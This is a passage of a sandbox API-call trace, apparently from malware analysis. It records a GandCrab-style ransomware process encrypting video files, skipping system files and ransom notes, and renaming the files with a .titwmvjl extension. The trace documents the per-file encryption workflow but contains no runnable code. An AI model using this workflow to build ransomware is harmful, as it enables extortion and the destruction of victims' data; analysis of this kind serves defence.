pdwDataLen=0x259ebd4*=0x4) returned 1 [0095.474] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.474] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0095.474] GetLastError () returned 0x0 [0095.474] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.475] CryptDestroyKey (hKey=0x5037f8) returned 1 [0095.475] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.475] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.475] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0095.475] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0095.475] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x1018b, lpOverlapped=0x0) returned 1 [0095.489] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffefe75, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.489] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1018b, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x1018b, lpOverlapped=0x0) returned 1 [0095.491] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.491] WriteFile (in: hFile=0x2c4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0095.503] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.507] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.508] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.508] CloseHandle (hObject=0x2c4) returned 1 [0095.509] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\1m--rBjd9UI99dS.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\1m--rbjd9ui99ds.swf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\1m--rBjd9UI99dS.swf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\1m--rbjd9ui99ds.swf.titwmvjl"), dwFlags=0x1) returned 1 [0095.510] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.510] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0095.510] lstrcmpW (lpString1="8aYToX1.swf", lpString2=".") returned 1 [0095.510] lstrcmpW (lpString1="8aYToX1.swf", lpString2="..") returned 1 [0095.510] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\", lpString2="8aYToX1.swf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\8aYToX1.swf") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\8aYToX1.swf" [0095.511] lstrlenW (lpString=".titwmvjl") returned 9 [0095.511] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\8aYToX1.swf") returned 89 [0095.511] VirtualAlloc (lpAddress=0x0, dwSize=0xf2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.511] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\8aYToX1.swf.titwmvjl") returned 98 [0095.511] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\8aYToX1.swf") returned 89 [0095.511] lstrlenW (lpString=".swf") returned 4 [0095.511] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.511] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".swf ") returned 5 [0095.511] lstrcmpiW (lpString1=".swf", lpString2=".titwmvjl") returned -1 [0095.511] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.511] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\8aYToX1.swf") returned 89 [0095.511] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\8aYToX1.swf") returned 89 [0095.511] lstrcmpiW (lpString1="8aYToX1.swf", lpString2="desktop.ini") returned -1 [0095.512] lstrcmpiW (lpString1="8aYToX1.swf", lpString2="autorun.inf") returned -1 [0095.512] lstrcmpiW (lpString1="8aYToX1.swf", lpString2="ntuser.dat") returned -1 [0095.512] lstrcmpiW (lpString1="8aYToX1.swf", lpString2="iconcache.db") returned -1 [0095.512] lstrcmpiW (lpString1="8aYToX1.swf", lpString2="bootsect.bak") returned -1 [0095.512] lstrcmpiW (lpString1="8aYToX1.swf", lpString2="boot.ini") returned -1 [0095.512] lstrcmpiW (lpString1="8aYToX1.swf", lpString2="ntuser.dat.log") returned -1 [0095.512] lstrcmpiW (lpString1="8aYToX1.swf", lpString2="thumbs.db") returned -1 [0095.512] lstrcmpiW (lpString1="8aYToX1.swf", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0095.512] lstrcmpiW (lpString1="8aYToX1.swf", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0095.512] lstrcmpiW (lpString1="8aYToX1.swf", lpString2="KRAB-DECRYPT.html") returned -1 [0095.512] lstrcmpiW (lpString1="8aYToX1.swf", lpString2="CRAB-DECRYPT.html") returned -1 [0095.512] lstrcmpiW (lpString1="8aYToX1.swf", lpString2="KRAB-DECRYPT.txt") returned -1 [0095.512] lstrcmpiW (lpString1="8aYToX1.swf", lpString2="CRAB-DECRYPT.txt") returned -1 [0095.512] lstrcmpiW (lpString1="8aYToX1.swf", lpString2="ntldr") returned -1 [0095.512] lstrcmpiW (lpString1="8aYToX1.swf", lpString2="NTDETECT.COM") returned -1 [0095.512] lstrcmpiW (lpString1="8aYToX1.swf", lpString2="Bootfont.bin") returned -1 [0095.512] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\8aYToX1.swf") returned 89 [0095.512] lstrlenW (lpString=".swf") returned 4 [0095.512] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.512] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".swf ") returned 5 [0095.512] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.512] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.513] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\8aYToX1.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\8aytox1.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0095.513] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.513] ReadFile (in: hFile=0x2c4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0095.514] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.514] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.514] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0095.515] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.515] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.515] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.515] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0095.515] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.515] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.515] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.515] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.516] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0095.516] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.516] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.516] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.516] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0095.516] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.517] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.517] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.517] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.517] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0095.517] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.517] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5033b8) returned 1 [0095.518] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.518] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0095.518] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.518] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0095.518] GetLastError () returned 0x0 [0095.518] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.518] CryptDestroyKey (hKey=0x5033b8) returned 1 [0095.518] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.519] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.519] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.519] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0095.519] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.519] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5032f8) returned 1 [0095.519] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.519] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0095.520] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.520] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0095.520] GetLastError () returned 0x0 [0095.520] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.520] CryptDestroyKey (hKey=0x5032f8) returned 1 [0095.520] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.520] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.520] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0095.521] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0095.521] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0xd423, lpOverlapped=0x0) returned 1 [0095.534] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xffff2bdd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.534] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xd423, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0xd423, lpOverlapped=0x0) returned 1 [0095.535] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.535] WriteFile (in: hFile=0x2c4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0095.537] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.540] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.540] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.541] CloseHandle (hObject=0x2c4) returned 1 [0095.541] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\8aYToX1.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\8aytox1.swf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\8aYToX1.swf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\8aytox1.swf.titwmvjl"), dwFlags=0x1) returned 1 [0095.542] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.542] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0095.542] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0095.542] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0095.542] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\d2ca4a09d2ca4deb61a.lock" [0095.542] lstrlenW (lpString=".titwmvjl") returned 9 [0095.542] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\d2ca4a09d2ca4deb61a.lock") returned 102 [0095.542] VirtualAlloc (lpAddress=0x0, dwSize=0x10c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.542] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 111 [0095.544] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\d2ca4a09d2ca4deb61a.lock") returned 102 [0095.544] lstrlenW (lpString=".lock") returned 5 [0095.544] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.544] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0095.544] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.544] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.544] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0095.544] lstrcmpW (lpString1="e1GFB.mkv", lpString2=".") returned 1 [0095.544] lstrcmpW (lpString1="e1GFB.mkv", lpString2="..") returned 1 [0095.544] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\", lpString2="e1GFB.mkv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\e1GFB.mkv") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\e1GFB.mkv" [0095.544] lstrlenW (lpString=".titwmvjl") returned 9 [0095.544] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\e1GFB.mkv") returned 87 [0095.545] VirtualAlloc (lpAddress=0x0, dwSize=0xee, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.545] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\e1GFB.mkv.titwmvjl") returned 96 [0095.545] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\e1GFB.mkv") returned 87 [0095.545] lstrlenW (lpString=".mkv") returned 4 [0095.545] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.545] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mkv ") returned 5 [0095.545] lstrcmpiW (lpString1=".mkv", lpString2=".titwmvjl") returned -1 [0095.545] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.545] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\e1GFB.mkv") returned 87 [0095.545] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\e1GFB.mkv") returned 87 [0095.545] lstrcmpiW (lpString1="e1GFB.mkv", lpString2="desktop.ini") returned 1 [0095.545] lstrcmpiW (lpString1="e1GFB.mkv", lpString2="autorun.inf") returned 1 [0095.545] lstrcmpiW (lpString1="e1GFB.mkv", lpString2="ntuser.dat") returned -1 [0095.545] lstrcmpiW (lpString1="e1GFB.mkv", lpString2="iconcache.db") returned -1 [0095.545] lstrcmpiW (lpString1="e1GFB.mkv", lpString2="bootsect.bak") returned 1 [0095.545] lstrcmpiW (lpString1="e1GFB.mkv", lpString2="boot.ini") returned 1 [0095.545] lstrcmpiW (lpString1="e1GFB.mkv", lpString2="ntuser.dat.log") returned -1 [0095.545] lstrcmpiW (lpString1="e1GFB.mkv", lpString2="thumbs.db") returned -1 [0095.545] lstrcmpiW (lpString1="e1GFB.mkv", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0095.545] lstrcmpiW (lpString1="e1GFB.mkv", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0095.545] lstrcmpiW (lpString1="e1GFB.mkv", lpString2="KRAB-DECRYPT.html") returned -1 [0095.545] lstrcmpiW (lpString1="e1GFB.mkv", lpString2="CRAB-DECRYPT.html") returned 1 [0095.545] lstrcmpiW (lpString1="e1GFB.mkv", lpString2="KRAB-DECRYPT.txt") returned -1 [0095.545] lstrcmpiW (lpString1="e1GFB.mkv", lpString2="CRAB-DECRYPT.txt") returned 1 [0095.545] lstrcmpiW (lpString1="e1GFB.mkv", lpString2="ntldr") returned -1 [0095.546] lstrcmpiW (lpString1="e1GFB.mkv", lpString2="NTDETECT.COM") returned -1 [0095.546] lstrcmpiW (lpString1="e1GFB.mkv", lpString2="Bootfont.bin") returned 1 [0095.546] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\e1GFB.mkv") returned 87 [0095.546] lstrlenW (lpString=".mkv") returned 4 [0095.546] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.546] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mkv ") returned 5 [0095.546] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.546] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.546] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\e1GFB.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\e1gfb.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0095.547] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.547] ReadFile (in: hFile=0x2c4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0095.547] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.547] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.547] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0095.548] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.548] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.548] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.548] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0095.548] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.548] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.548] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.548] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.549] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0095.549] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.549] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.549] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.549] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0095.549] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.549] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.549] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.550] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.550] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0095.550] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.550] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503478) returned 1 [0095.550] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.550] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0095.550] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.551] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, 